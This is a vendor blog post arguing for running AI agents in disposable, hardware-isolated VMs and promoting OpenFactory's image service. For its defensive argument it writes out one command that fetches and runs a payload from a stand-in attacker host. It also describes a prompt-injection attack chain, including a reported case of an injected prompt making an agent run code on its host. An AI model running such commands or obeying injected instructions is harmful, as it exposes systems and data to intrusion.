Why do AI agents need sandboxed compute environments?

AI agents execute code generated from natural language prompts. This creates a direct path from prompt injection to arbitrary code execution. Without sandboxing, a compromised agent can read files, exfiltrate data, install backdoors, or pivot to other systems on the network. Sandboxed VMs contain the blast radius: even if the agent is compromised, the attacker is trapped in a disposable environment with no access to production systems or sensitive data.

Why use VMs instead of containers for AI agent sandboxing?

Containers share the host kernel, which means a kernel exploit from inside the container can reach the host and all other containers. AI agents run arbitrary, untrusted code: the exact threat model where container isolation breaks down. VMs provide hardware-enforced isolation with separate kernels. Each agent VM is a completely independent machine that cannot access the host or other VMs even if fully compromised.

How does OpenFactory help with AI agent sandboxing?

OpenFactory builds purpose-built Linux VM images containing only what the agent needs: specific language runtimes, tools, browsers, or libraries. These images are reproducible, minimal (smaller attack surface), and disposable. Deploy one VM per agent session, destroy it when done, and rebuild from the clean image for the next session. The agent gets a full computer with hardware isolation, and you get deterministic, auditable environments.

Give Your AI Agent a Computer, Securely

January 27, 2026

← Back to Blog

The most capable AI agents need more than API access. They need to write code and run it, browse the web, install packages, read and write files, and use command-line tools. In short, they need a computer.

The problem is obvious: giving an AI agent a computer means giving it the ability to execute arbitrary code. And that code comes from natural language prompts, the most injection-prone input surface in computing. One prompt injection away from curl attacker.com/payload | bash.

This is not a tail risk anymore. In its Top 10 for Agentic Applications (December 2025), OWASP put goal hijack and tool misuse at the top of the list precisely because hidden prompts have already turned production copilots into exfiltration engines. The answer is not to make the model perfectly obedient; it is to make the environment it runs in disposable. The diagram below shows the shape of the defense: the agent gets a real computer, but it is a sealed one.

A compromised agent is trapped inside its disposable VM. The CPU's virtualization extensions, not a software policy, stop it from reaching the host kernel, secrets, or the production network.

The Attack Chain

Prompt injection leads to code generation, code generation leads to code execution, and unsandboxed code execution leads to data exfiltration, lateral movement, or persistent backdoors. The entire chain from “user message” to “compromised server” can happen in a single agent turn.

It's not hypothetical. In May 2026, Microsoft's own security team showed that a single injected prompt was enough to launch calc.exe on the host running an agent built on Semantic Kernel (CVE-2026-26030). A related flaw let the agent write a payload straight into the Windows Startup folder (CVE-2026-25592). Their conclusion is the one that matters here: your LLM is not a security boundary, and any tool parameter the model can influence must be treated as attacker-controlled input. The agent faithfully executes injected instructions because it can't distinguish them from legitimate requests.

Prompt injection: malicious instructions embedded in user input, retrieved documents, web pages, or tool outputs.
Code execution: the agent generates and runs code containing the injected payload.
Data exfiltration: anything the agent's process can read, including secrets, API keys, database credentials, and source code.
Lateral movement: from the agent's environment to other services on the network, cloud metadata endpoints, or internal APIs.
Persistent access: SSH keys, cron jobs, and modified dependencies become backdoors that survive the agent session.

Why Containers Aren't Enough

Most agent sandboxing solutions use containers. Containers share the host kernel. A kernel exploit from inside the container reaches the host and every other container on it. For untrusted code execution, this is the wrong isolation boundary.

Docker containers were designed for packaging and deployment, not for running hostile code. The isolation is process-level: namespaces and cgroups. These are software abstractions over a shared kernel. When the shared kernel has a vulnerability (and it regularly does), the isolation disappears.

Seccomp profiles and AppArmor help, but they're allowlists over a complex syscall interface. One missed syscall, one edge case in a filter, and the escape is possible. For AI agents executing arbitrary, unpredictable code, you want the isolation boundary to be hardware, not policy.

Hardware Isolation: A Separate Kernel

VMs run their own kernel. The isolation is enforced by the CPU's virtualization extensions (Intel VT-x, AMD-V), not by software policy. A compromised VM cannot access the host kernel, other VMs, or the host network. There is no shared kernel to exploit.

This is the same isolation model used by every major cloud provider to separate tenants. AWS, GCP, and Azure all use hardware virtualization as the trust boundary between customers. If it's good enough to separate competing enterprises on the same physical hardware, it's good enough for your AI agents.

The old objection (“VMs are too heavy to spin up per task”) no longer holds. Lightweight VM monitors like Firecracker boot a fresh guest in roughly 125 milliseconds with under 5 MiB of memory overhead per VM, which is why per-agent microVMs have become the default isolation model for hosted code-execution sandboxes. You get the security of a separate kernel at close to container-launch latency.

The OpenFactory Approach

Build purpose-built VM images containing only what the agent needs. Deploy one per agent session. Destroy it when done. Every session starts from a clean, reproducible, minimal image with hardware-level isolation.

OpenFactory lets you define exactly what goes into the agent's VM:

Language runtimes: Python, Node.js, Go, Rust (only what the agent needs). No extra attack surface.
Development tools: git, compilers, linters, formatters. A full development environment without the risk.
Browser: for web-browsing agents that need to navigate, scrape, or interact with web applications.
CLI tools: curl, jq, database clients, cloud CLIs, and whatever else the agent uses to accomplish its tasks.
Nothing else: no SSH server (unless needed), no package manager (build-time only), no unnecessary services. Minimal surface area.

Use Cases

Coding agents: agents that write, test, and debug code need a full development environment. Give them a VM with the project's language runtime, test framework, and build tools. If the agent goes rogue, it can only damage its own disposable VM.
Web-browsing agents: agents that navigate websites, fill forms, or extract data need a browser. Run it in an isolated VM so compromised web pages can't reach your infrastructure.
Data analysis agents: agents that process datasets, run queries, or generate reports. Isolate them from production data stores and give them only the data they need inside the VM.
MCP tool servers: Model Context Protocol servers that expose tools to AI models. Each MCP server runs in its own VM, so a compromised tool can't affect other tools or the host.
CI/CD agents: build and deployment pipelines that run in isolated VMs. Even if a supply chain attack compromises a dependency, the blast radius is contained.

Disposable by Design

The best security property of an agent VM is that it doesn't persist. Deploy from a clean image, run the task, destroy the VM. No state accumulates. No backdoors survive. Every session is a fresh start from a known-good baseline.

Traditional infrastructure fights to keep servers running. Agent infrastructure should fight to tear them down. The shorter the VM lives, the smaller the window for an attacker. The less state it accumulates, the less there is to exfiltrate.

Reproducible: every VM boots from the same image. No configuration drift, no “works on my machine.”
Auditable: the image definition is code. You can review exactly what's installed, what services run, and what network access is allowed.
Versioned: update the image definition, rebuild, and deploy. Roll back to a previous version if something breaks.
Ephemeral: destroy after use. No cleanup scripts, no state migration, no accumulated risk.

How to Build It

Describe your agent's requirements to OpenFactory (language runtimes, tools, security level) and get a deployable VM image in minutes. No Dockerfile, no Packer templates, no manual configuration.

Go to console.openfactory.tech and describe what your agent needs: “Python 3.12, Node.js 22, Firefox, git, strict security, no SSH.”
OpenFactory generates a hardened Linux image with exactly those components and nothing else.
Deploy the image on your hypervisor (KVM, VMware, Hyper-V) or use OpenFactory's fleet management to deploy and manage instances at scale.
Point your agent framework at the VM via SSH, API, or guest agent. Or wire it up through the OpenFactory MCP server so the agent can build and deploy its own sandbox on demand. The agent gets a full computer. You get hardware isolation.

Stop running AI agents on your production servers. Stop trusting containers to isolate untrusted code. Give your agents their own computers: isolated, disposable, and purpose-built.

Build an Agent Sandbox Browse Scenarios

Ready to ship this in production?

OpenFactory's free flow is for browsing. Persistent VMs, SSH access, snapshots, your own ISO, and fleet deployment live on a paid plan.

See pricing →Book a demo